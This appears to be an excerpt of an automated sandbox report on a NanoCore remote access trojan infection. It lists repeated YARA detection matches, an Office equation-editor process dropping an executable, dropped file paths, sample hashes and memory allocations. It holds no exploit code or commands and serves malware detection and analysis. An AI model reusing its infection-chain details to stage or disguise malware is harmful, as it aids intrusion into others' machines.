      Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\plugmancdht5461.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeJump to dropped file
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE indicator application name: unknown
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_0049505A
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_0049012C
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_00493998
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_004939A8
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_00493C00
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_00493C10
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_0049D6E8
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeCode function: 4_2_00490790
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A5AD1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A3DFF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005F02B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BE058
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BC0C8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004B43A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BB4B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004B3788
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004BC186
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004B4458
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_049204E8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_04923C50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_04924540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_049205A6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_04920DC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_04923900
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and write
      Source: 9.2.RegSvcs.exe.d90000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.d90000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.5f0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.5f0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4610000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4610000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.b50000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.b50000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.b50000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.b50000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4610000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4610000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.a90000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.a90000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.ab0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.ab0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.39a632e.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.39a632e.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4600000.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4600000.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.48fe8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.48fe8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a12e3f.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a12e3f.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a12e3f.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.b80000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.b80000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a2a09e.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a2a09e.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.261c894.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.261c894.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.d90000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.d90000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4850000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4850000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.a90000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.a90000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.d80000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.d80000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.b70000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.b70000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.48f0000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.48f0000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.269d93c.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
